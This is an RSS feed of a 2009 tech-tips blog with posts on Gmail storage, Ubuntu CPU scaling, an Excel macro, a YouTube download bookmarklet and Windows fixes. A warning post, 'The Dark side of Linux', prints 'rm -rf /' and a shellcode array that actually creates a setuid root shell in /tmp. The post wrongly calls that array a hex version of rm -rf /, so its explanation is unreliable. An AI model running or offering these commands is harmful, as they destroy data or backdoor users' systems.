<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" version="2.0">

<channel>
	<title>Bridge to Nova</title>
	
	<link>http://www.bridgetonova.com</link>
	<description>Keep Your Mind Wide Open</description>
	<lastBuildDate>Sat, 05 Dec 2009 04:14:25 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/BridgeToNova" /><feedburner:info xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" uri="bridgetonova" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><feedburner:emailServiceId xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0">BridgeToNova</feedburner:emailServiceId><feedburner:feedburnerHostname xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0">http://feedburner.google.com</feedburner:feedburnerHostname><item>
		<title>You can upgrade your Google account up to 16TB</title>
		<link>http://www.bridgetonova.com/2009/11/you-can-upgrade-your-google-account-up-to-16tb.html</link>
		<comments>http://www.bridgetonova.com/2009/11/you-can-upgrade-your-google-account-up-to-16tb.html#comments</comments>
		<pubDate>Wed, 11 Nov 2009 12:47:08 +0000</pubDate>
		<dc:creator>Jason</dc:creator>
				<category><![CDATA[Google]]></category>
		<category><![CDATA[Internet]]></category>

		<guid isPermaLink="false">http://www.bridgetonova.com/2009/11/you-can-upgrade-your-google-account-up-to-16tb.html</guid>
		<description><![CDATA[Google has really changed the game for webmail since they launched Gmail five years ago. Now free Gmail is offering over 7GB. But if this is not enough for you, you can upgrade to 20GB for merely 5 bucks a year.
Here is the list of plans.

Excited? Where to purchase? Here you go! (link) Just to [...]]]></description>
			<content:encoded><![CDATA[<p><script type="text/javascript"><!--
google_ad_client = "pub-7697226414384593";
//468x60, btn home page
google_ad_slot = "3068992652";
google_ad_width = 468;
google_ad_height = 60;
//--></script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></p><p>Google has really changed the game for webmail since they launched Gmail five years ago. Now free Gmail is offering over 7GB. But if this is not enough for you, you can upgrade to 20GB for merely 5 bucks a year.</p>
<p>Here is the list of plans.</p>
<p><a href="http://www.bridgetonova.com/wp-content/uploads/2009/11/googleupgrade.png"><img style="border-bottom: 0px; border-left: 0px; display: block; float: none; margin-left: auto; border-top: 0px; margin-right: auto; border-right: 0px" title="google upgrade" src="http://www.bridgetonova.com/wp-content/uploads/2009/11/googleupgrade_thumb.png" border="0" alt="google upgrade" width="234" height="289" /></a></p>
<p>Excited? Where to purchase? Here you go! (<a href="https://www.google.com/accounts/PurchaseStorage">link</a>) Just to remind you that if you do upgrade, not only you can use that extra space in Gmail, also in Picasa Web Albums.</p>
<p>Source : <a href="http://gmailblog.blogspot.com/2009/11/more-extra-storage-for-less.html">Gmail Blog</a></p>
<img src="http://feeds.feedburner.com/~r/BridgeToNova/~4/GVy8t__JElk" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.bridgetonova.com/2009/11/you-can-upgrade-your-google-account-up-to-16tb.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to check and change CPU speed in Ubuntu</title>
		<link>http://www.bridgetonova.com/2009/10/how-to-check-and-change-cpu-speed-in-ubuntu.html</link>
		<comments>http://www.bridgetonova.com/2009/10/how-to-check-and-change-cpu-speed-in-ubuntu.html#comments</comments>
		<pubDate>Thu, 29 Oct 2009 18:35:03 +0000</pubDate>
		<dc:creator>Jason</dc:creator>
				<category><![CDATA[Linux]]></category>

		<guid isPermaLink="false">http://www.bridgetonova.com/2009/10/how-to-check-and-change-cpu-speed-in-ubuntu.html</guid>
		<description><![CDATA[

If you are control freak, perhaps you might want to take control of your CPU depending on your need. Firstly, you should be able to check what is the current speed of your CPU. Here is the command.
cat /proc/cpuinfo &#124; grep -i Mhz

You will see your CPU speed in Mhz. To take control of your [...]]]></description>
			<content:encoded><![CDATA[<p>If you are control freak, perhaps you might want to take control of your CPU depending on your need. Firstly, you should be able to check what is the current speed of your CPU. Here is the command.</p>
<blockquote><p>cat /proc/cpuinfo | grep -i Mhz</p>
</blockquote>
<p>You will see your CPU speed in Mhz. To take control of your CPU speed, you need to install cpufreq utility.</p>
<blockquote><p>sudo apt-get install cpufrequtils</p>
</blockquote>
<p>There are four modes come with the utility. They are as follow:</p>
<blockquote><ul>
<li><em>ondemand</em> </li>
</ul>
<p>CPU frequency is scaled based on load. </p>
<ul>
<li><em>conservative </em></li>
</ul>
<p>The CPUfreq governor &quot;conservative&quot;, much like the &quot;ondemand&quot; governor, sets the CPU depending on the current usage. It differs in behaviour in that it gracefully increases and decreases the CPU speed rather than jumping to max speed the moment there is any load on the CPU. This behaviour more suitable in a battery powered environment. </p>
<ul>
<li><em>performance</em> </li>
</ul>
<p>CPU only runs at max frequency regardless of load. </p>
<ul>
<li><em>powersave </em></li>
</ul>
<p>CPU only runs at min frequency regardless of load. </p>
</blockquote>
<p>Depending on your need, you can set cpu freq as you desire. For example: to change to ondemand mode, type this command</p>
<blockquote><p>cpufreq-set -g ondemand</p>
</blockquote>
<p>In case if you have more than one CPU, you need to repeat the command with option c. You can check how many CPU you have by typing </p>
<blockquote><p>ls /sys/devices/system/cpu/ </p>
</blockquote>
<p>To set the cpufreq for second cpu, you need to use option c as follow:</p>
<blockquote><p>cpufreq-set -c 1 -g ondemand</p>
</blockquote>
<p>I hope this will be helpful. Any question? Leave a comment as usual.</p>
<p>&#160;</p>
<p>Source : <a href="http://ubuntuguide.org/wiki/Ubuntu:Feisty#How_to_enable_your_CPU.27s_Power_Saving.2FFrequency_Scaling_features">Ubuntuguide</a></p>
<img src="http://feeds.feedburner.com/~r/BridgeToNova/~4/9oaVlASF1i8" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.bridgetonova.com/2009/10/how-to-check-and-change-cpu-speed-in-ubuntu.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to delete every other row in Excel</title>
		<link>http://www.bridgetonova.com/2009/07/how-to-delete-every-other-row-in-excel.html</link>
		<comments>http://www.bridgetonova.com/2009/07/how-to-delete-every-other-row-in-excel.html#comments</comments>
		<pubDate>Sat, 04 Jul 2009 06:03:18 +0000</pubDate>
		<dc:creator>Jason</dc:creator>
				<category><![CDATA[MS Office]]></category>
		<category><![CDATA[My Experience]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://www.bridgetonova.com/2009/07/how-to-delete-every-other-row-in-excel.html</guid>
		<description><![CDATA[Have you ever looking for option to delete every odd or even rows in Excel? Looking through menu after menu, hoping there’s some option hidden somewhere? 
Well, the bad news is that there’s no built-in function as of Excel 2007. You need to use some marco to do just that. 
Here’s the procedure. This procedure [...]]]></description>
			<content:encoded><![CDATA[<p>Have you ever looking for option to delete every odd or even rows in Excel? Looking through menu after menu, hoping there’s some option hidden somewhere? </p>
<p>Well, the bad news is that there’s no built-in function as of Excel 2007. You need to use some marco to do just that. </p>
<p>Here’s the procedure. This procedure applies to all Excel versions from 97 to 2007, however I’ll provide screenshot using Excel 2007.</p>
<p>&#160;</p>
<ul>
<li>Open your Excel file. </li>
</ul>
<p><a href="http://www.bridgetonova.com/wp-content/uploads/2009/07/samplesheet.jpg"><img style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="sample sheet" border="0" alt="sample sheet" src="http://www.bridgetonova.com/wp-content/uploads/2009/07/samplesheet_thumb.jpg" width="204" height="295" /></a> </p>
<ul>
<li>In Excel 2007, Go to Developer tab, click Visual Basic. (All other Excel versions, go to Tools menu -&gt; Marco –&gt; Visual Basic Editor) </li>
</ul>
<p><a href="http://www.bridgetonova.com/wp-content/uploads/2009/07/excel2007developertab.jpg"><img style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="excel 2007 developer tab" border="0" alt="excel 2007 developer tab" src="http://www.bridgetonova.com/wp-content/uploads/2009/07/excel2007developertab_thumb.jpg" width="504" height="111" /></a> </p>
<p>&#160;</p>
<ul>
<li>Then in Visual Basic window, Insert Menu –&gt; Module </li>
</ul>
<p><a href="http://www.bridgetonova.com/wp-content/uploads/2009/07/vbinsertmenu.png"><img style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="vb insert menu" border="0" alt="vb insert menu" src="http://www.bridgetonova.com/wp-content/uploads/2009/07/vbinsertmenu_thumb.png" width="384" height="181" /></a>&#160; </p>
<ul>
<li>After that copy and paste the following code into the module window. </li>
</ul>
<blockquote><pre>Sub Delete_Every_Other_Row()

   ' Dimension variables.
   Y = False              ' Change this to True if you want to
                          ' delete rows 1, 3, 5, and so on.
   I = 1
   Set xRng = Selection

   ' Loop once for every row in the selection.
   For xCounter = 1 To xRng.Rows.Count

       ' If Y is True, then...
       If Y = True Then

           ' ...delete an entire row of cells.
           xRng.Cells(I).EntireRow.Delete

       ' Otherwise...
       Else

           ' ...increment I by one so we can cycle through range.
           I = I + 1

       End If

       ' If Y is True, make it False; if Y is False, make it True.
       Y = Not Y

   Next xCounter

End Sub</pre>
</blockquote>
<ul>
<li>Go back to your excel workbook,&#160; Select the Cells that you want for alternative rows to delete. <em>Note : It is important to select the cells, if you select the whole column, Excel will most likely hang when you run Macro.</em> </li>
</ul>
<p><a href="http://www.bridgetonova.com/wp-content/uploads/2009/07/selectcell.png"><img style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="select cell" border="0" alt="select cell" src="http://www.bridgetonova.com/wp-content/uploads/2009/07/selectcell_thumb.png" width="186" height="244" /></a> </p>
<p>&#160;</p>
<ul>
<li>After that, click Marcos under Developer tab in Excel 2007. (All other excel versions, Tools menu –&gt; Marcos ) You should see the dialog box as follow. Click on Run. </li>
</ul>
<p><a href="http://www.bridgetonova.com/wp-content/uploads/2009/07/marcopopup.png"><img style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="marco popup" border="0" alt="marco popup" src="http://www.bridgetonova.com/wp-content/uploads/2009/07/marcopopup_thumb.png" width="384" height="384" /></a> </p>
<p>Bravo! That’s it! Hopefully Excel 2010 will have built-in function for this.&#160; </p>
<p>&#160;</p>
</p>
<p>Source : <a href="http://support.microsoft.com/kb/213610">Microsoft</a></p>
<img src="http://feeds.feedburner.com/~r/BridgeToNova/~4/vg63N4AqrsY" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.bridgetonova.com/2009/07/how-to-delete-every-other-row-in-excel.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to download Youtube HD video</title>
		<link>http://www.bridgetonova.com/2009/05/how-to-download-youtube-hd-video.html</link>
		<comments>http://www.bridgetonova.com/2009/05/how-to-download-youtube-hd-video.html#comments</comments>
		<pubDate>Mon, 18 May 2009 07:32:28 +0000</pubDate>
		<dc:creator>Jason</dc:creator>
				<category><![CDATA[Google]]></category>
		<category><![CDATA[Internet]]></category>
		<category><![CDATA[Tips]]></category>

		<guid isPermaLink="false">http://www.bridgetonova.com/2009/05/how-to-download-youtube-hd-video.html</guid>
		<description><![CDATA[I know this is old news. Anyway for those of you who don&#8217;t know it yet, as Google is the coolest company on the planet, they now let you watch some/most of Youtube video in mp4 high definition format. Furthermore, you can even download those youtube HD video to your local computer with a simple [...]]]></description>
			<content:encoded><![CDATA[<p>I know this is old news. Anyway for those of you who don&#8217;t know it yet, as Google is the coolest company on the planet, they now let you watch some/most of Youtube video in mp4 high definition format. Furthermore, you can even download those youtube HD video to your local computer with a simple tweak. It&#8217;s really easy. Here is how. </p>
<ul>
<li>Copy the following code.</li>
</ul>
<blockquote><p>javascript:window.location.href = &#8216;http://youtube.com/get_video?video_id=&#8217; + swfArgs['video_id'] + &#8220;&amp;fmt=22&#8243; + &#8220;&amp;l=&#8221; + swfArgs['l'] + &#8220;&amp;sk=&#8221; + swfArgs['sk'] + &#8216;&amp;t=&#8217; + swfArgs['t'];</p>
</blockquote>
<ul>
<li>Then Right Click on the bookmark bar, select New Bookmark.
<li>Paste the above code in Location field, type the Name as anything you like (For me &#8220;Download Youtube HD&#8221;). Click Add.</li>
</ul>
<p align="center"><a href="http://www.bridgetonova.com/wp-content/uploads/2009/05/bookmark.jpg"><img style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" border="0" alt="bookmark" src="http://www.bridgetonova.com/wp-content/uploads/2009/05/bookmark-thumb.jpg" width="304" height="210"></a> </p>
<ul>
<li>Then go to the youtube hd movie you want to download.
<li>Click Download Youtube HD button on your bookmark bar. You should get the following dialog box. </li>
</ul>
<p align="center"><a href="http://www.bridgetonova.com/wp-content/uploads/2009/05/download-youtube-hd.jpg"><img style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" border="0" alt="download youtube hd" src="http://www.bridgetonova.com/wp-content/uploads/2009/05/download-youtube-hd-thumb.jpg" width="304" height="232"></a> </p>
<p>That&#8217;s it!! Save that video.mp4 file in your preferred location and rename the file to anything you like.</p>
<p>Still don&#8217;t get it? Perhaps the following video tutorial might be able to help you.&nbsp; </p>
<p align="center"><embed height="344" type="application/x-shockwave-flash" width="425" src="http://www.youtube.com/v/q-C5ldEFcXA&amp;color1=0xb1b1b1&amp;color2=0xcfcfcf&amp;feature=player_embedded&amp;fs=1" allowfullscreen="true"></p>
<p>&nbsp;</p>
<p>Source : <a href="http://unlockforus.blogspot.com/2008/12/mp4-format-download-and-save-youtube.html">Unlockforus</a></p>
<p></embed></p>
<img src="http://feeds.feedburner.com/~r/BridgeToNova/~4/J4N5pZe_-kY" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.bridgetonova.com/2009/05/how-to-download-youtube-hd-video.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The Dark side of Linux</title>
		<link>http://www.bridgetonova.com/2009/05/the-dark-side-of-linux.html</link>
		<comments>http://www.bridgetonova.com/2009/05/the-dark-side-of-linux.html#comments</comments>
		<pubDate>Sun, 03 May 2009 20:26:29 +0000</pubDate>
		<dc:creator>Jason</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Tips]]></category>

		<guid isPermaLink="false">http://www.bridgetonova.com/2009/05/the-dark-side-of-linux.html</guid>
		<description><![CDATA[Yep, Ubuntu 9.04 is out and making buzz as usual. Most of the new Linux users are excited about “No more virus, yeah?”. Well, it’s quite true. Linux is more secure and have got very low security risk. But beware! Linux has got its own dark side as command line could do anything. 
If you [...]]]></description>
			<content:encoded><![CDATA[<p>Yep, Ubuntu 9.04 is out and making buzz as usual. Most of the new Linux users are excited about “No more virus, yeah?”. Well, it’s quite true. Linux is more secure and have got very low security risk. But beware! Linux has got its own dark side as command line could do anything. </p>
<p>If you ever ask for help in some forums or chat rooms, some of the users could have tricked you to enter the commands that will harm your computers and lose your precious files permanently. </p>
<p>The most dangerous command for novice users is</p>
<blockquote><p>rm -rf /</p>
</blockquote>
<p>This command will forcefully delete all the files inside the root and all sub directories.</p>
<p>Another one, this one could even fool experienced linux users.</p>
<blockquote><p>char esp[] __attribute__ ((section(&quot;.text&quot;))) /* e.s.p     <br />release */      <br />= &quot;\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68&quot;      <br />&quot;\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99&quot;      <br />&quot;\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7&quot;      <br />&quot;\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56&quot;      <br />&quot;\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31&quot;      <br />&quot;\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69&quot;      <br />&quot;\x6e\x2f\x73\x68\x00\x2d\x63\x00&quot;      <br />&quot;cp -p /bin/sh /tmp/.beyond; chmod 4755      <br />/tmp/.beyond;&quot;;</p>
</blockquote>
<p>What the heck is that you may ask. Well it’s the equivalent of rm –rf / in hex version.</p>
<p>So how can you avoid the disaster? My advice would be always do man or google the commands the strangers give you before you execute. </p>
<img src="http://feeds.feedburner.com/~r/BridgeToNova/~4/BeHVvkrUelk" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.bridgetonova.com/2009/05/the-dark-side-of-linux.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>rpm -qf equivalent in apt</title>
		<link>http://www.bridgetonova.com/2009/04/rpm-qf-equivalent-in-apt.html</link>
		<comments>http://www.bridgetonova.com/2009/04/rpm-qf-equivalent-in-apt.html#comments</comments>
		<pubDate>Tue, 21 Apr 2009 12:47:49 +0000</pubDate>
		<dc:creator>Jason</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Tips]]></category>

		<guid isPermaLink="false">http://www.bridgetonova.com/2009/04/rpm-qf-equivalent-in-apt.html</guid>
		<description><![CDATA[Those who migrate to Debian variant from Red Hat will be missing the convenient of rpm -qf. 
For those of you who don&#8217;t know what is rpm -qf &#60;filename&#62;, this command is very useful if you used rpm package management system. It will tell you which package manage that file.

Many people are not aware of [...]]]></description>
			<content:encoded><![CDATA[<p>Those who migrate to Debian variant from Red Hat will be missing the convenient of rpm -qf. </p>
<blockquote><p>For those of you who don&#8217;t know what is rpm -qf &lt;filename&gt;, this command is very useful if you used rpm package management system. It will tell you which package manage that file.</p>
</blockquote>
<p>Many people are not aware of the Debian alternative for rpm -qf. First you need&nbsp; to install apt-file by using the following command.</p>
<ul>
<li>-sudo apt-get install apt-file</li>
</ul>
<p>Now you can search the package of the file by using: </p>
<ul>
<li>sudo apt-file search –fixed-string $&lt;filename&gt; </li>
</ul>
<p>That&#8217;s it! I hope this will help you in your troubleshooting, debugging, resolving version conflicts, etc&#8230;</p>
<img src="http://feeds.feedburner.com/~r/BridgeToNova/~4/tEVXZZPV4lk" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.bridgetonova.com/2009/04/rpm-qf-equivalent-in-apt.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>File size column missing in Vista or Windows 2008 Server</title>
		<link>http://www.bridgetonova.com/2009/04/file-size-column-missing-in-vista-or-windows-2008-server.html</link>
		<comments>http://www.bridgetonova.com/2009/04/file-size-column-missing-in-vista-or-windows-2008-server.html#comments</comments>
		<pubDate>Thu, 16 Apr 2009 08:49:34 +0000</pubDate>
		<dc:creator>Jason</dc:creator>
				<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[Tricks]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://www.bridgetonova.com/2009/04/file-size-column-missing-in-vista-or-windows-2008-server.html</guid>
		<description><![CDATA[ 
Recently I&#8217;ve noticed that there&#8217;s no size column in My Computer or Windows Explorer. Then when I tried to look in the details list, it&#8217;s not listed as an option.
Very wired indeed. After a few rounds of Googling, I&#8217;ve found that Windows Search 4.0 is the culprit. Before I give a boot to Windows [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.bridgetonova.com/wp-content/uploads/2009/04/vista-size-column-missing.png"><img style="border-bottom: 0px; border-left: 0px; border-top: 0px; border-right: 0px" border="0" alt="vista-size-column-missing" src="http://www.bridgetonova.com/wp-content/uploads/2009/04/vista-size-column-missing-thumb.png" width="484" height="96"></a> </p>
<p>Recently I&#8217;ve noticed that there&#8217;s no size column in My Computer or Windows Explorer. Then when I tried to look in the details list, it&#8217;s not listed as an option.</p>
<p>Very wired indeed. After a few rounds of Googling, I&#8217;ve found that Windows Search 4.0 is the culprit. Before I give a boot to Windows Search 4.0, I&#8217;ve found better solution.</p>
<p>The problem could be due to during installation of Windows Search 4.0, my Property Schema Cache was not created correctly. Deleting the following registry key solved my problem.</p>
<p>HKLM\Software\Microsoft\Windows\CurrentVersion\PropertySystem\PropertySchema\@CachedSchema</p>
<p>Source : <a href="http://social.microsoft.com/Forums/en-US/winservergen/thread/767ef9a8-296a-4cea-b90c-c48677026ade">Microsoft Social</a></p>
<img src="http://feeds.feedburner.com/~r/BridgeToNova/~4/6i-wOcb3Xyk" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.bridgetonova.com/2009/04/file-size-column-missing-in-vista-or-windows-2008-server.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Bad time, huh?</title>
		<link>http://www.bridgetonova.com/2009/04/bad-time-huh.html</link>
		<comments>http://www.bridgetonova.com/2009/04/bad-time-huh.html#comments</comments>
		<pubDate>Sat, 11 Apr 2009 05:22:12 +0000</pubDate>
		<dc:creator>Jason</dc:creator>
				<category><![CDATA[Innovative]]></category>
		<category><![CDATA[Misc]]></category>

		<guid isPermaLink="false">http://www.bridgetonova.com/2009/04/bad-time-huh.html</guid>
		<description><![CDATA[
&#160;
Source : Digg
]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.bridgetonova.com/wp-content/uploads/2009/04/helpwanted2b-0img-assist-custom1.jpg"><img style="border-bottom: 0px; border-left: 0px; border-top: 0px; border-right: 0px" border="0" alt="HelpWanted2b_0.img_assist_custom" src="http://www.bridgetonova.com/wp-content/uploads/2009/04/helpwanted2b-0img-assist-custom-thumb1.jpg" width="484" height="420"></a></p>
<p>&nbsp;</p>
<p>Source : <a href="http://digg.com/odd_stuff/Best_Help_Wanted_Store_Sign_You_ll_See_Today">Digg</a></p>
<img src="http://feeds.feedburner.com/~r/BridgeToNova/~4/kEa40PNEUk0" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.bridgetonova.com/2009/04/bad-time-huh.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Twitter admin password is “Happiness”</title>
		<link>http://www.bridgetonova.com/2009/01/twitter-admin-password-is-happiness.html</link>
		<comments>http://www.bridgetonova.com/2009/01/twitter-admin-password-is-happiness.html#comments</comments>
		<pubDate>Thu, 08 Jan 2009 05:22:20 +0000</pubDate>
		<dc:creator>David</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[Tech News]]></category>

		<guid isPermaLink="false">http://www.bridgetonova.com/?p=384</guid>
		<description><![CDATA[The hacker, who goes by the handle GMZ, said he gained access to Twitter&#8217;s administrative control panel by using a brute-force dictionary password cracker. Fortunately for him, the user turned out to be a member of Twitter&#8217;s admin, who&#8217;d chosen the weak password &#8220;happiness.
Twitter has got very serious security loopholes.

First no password protection for continuous [...]]]></description>
			<content:encoded><![CDATA[<p>The hacker, who goes by the handle GMZ, said he gained access to Twitter&#8217;s administrative control panel by using a brute-force dictionary password cracker. Fortunately for him, the user turned out to be a member of Twitter&#8217;s admin, who&#8217;d chosen the weak password &#8220;happiness.</p>
<p>Twitter has got very serious security loopholes.</p>
<ul>
<li>First no password protection for continuous retried attempts.</li>
<li>Second, what kind of admins would have used such a dictionary password.</li>
</ul>
<p>Anyway, it was a fun for hackers community as they got the glimpse of famous celebrity such as Obama, Britney and even Fox News official account.</p>
<p>Source : <a href="http://digg.com/tech_news/Twitter_Hacker_Says_Admin_Password_Was_Happiness?FC=PRCT1">Digg</a></p>
<img src="http://feeds.feedburner.com/~r/BridgeToNova/~4/DpGaFJoKHkQ" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.bridgetonova.com/2009/01/twitter-admin-password-is-happiness.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Chrome password recovery</title>
		<link>http://www.bridgetonova.com/2008/10/chrome-password-recovery.html</link>
		<comments>http://www.bridgetonova.com/2008/10/chrome-password-recovery.html#comments</comments>
		<pubDate>Thu, 02 Oct 2008 03:33:06 +0000</pubDate>
		<dc:creator>Jason</dc:creator>
				<category><![CDATA[Google]]></category>
		<category><![CDATA[Programs]]></category>
		<category><![CDATA[Tips]]></category>

		<guid isPermaLink="false">http://www.bridgetonova.com/2008/10/chrome-password-recovery.html</guid>
		<description><![CDATA[With all the buzz Chrome is getting, you wouldn&#8217;t be surprised there are tools developed aim at Chrome. Are using Chrome daily basis and saved your password in it, but can&#8217;t remember anymore?
No worry. There is Chrome password recover utility available now.

All you have to do is download Chrome Password Recovery tool. No need to [...]]]></description>
			<content:encoded><![CDATA[<p>With all the buzz Chrome is getting, you wouldn&#8217;t be surprised there are tools developed aim at Chrome. Are using Chrome daily basis and saved your password in it, but can&#8217;t remember anymore?</p>
<p>No worry. There is Chrome password recover utility available now.</p>
<p><a href="http://www.bridgetonova.com/wp-content/uploads/2008/09/chromepass.png"><img style="border-right: 0px; border-top: 0px; border-left: 0px; border-bottom: 0px" src="http://www.bridgetonova.com/wp-content/uploads/2008/09/chromepass-thumb.png" border="0" alt="chromepass" width="504" height="158" /></a></p>
<p>All you have to do is download <a href="http://www.nirsoft.net/utils/chromepass.zip">Chrome Password Recovery</a> tool. No need to install, just run it and it will list all your Chrome saved passwords. Cool, huh?</p>
<img src="http://feeds.feedburner.com/~r/BridgeToNova/~4/pZRAGfEbx_Q" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.bridgetonova.com/2008/10/chrome-password-recovery.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
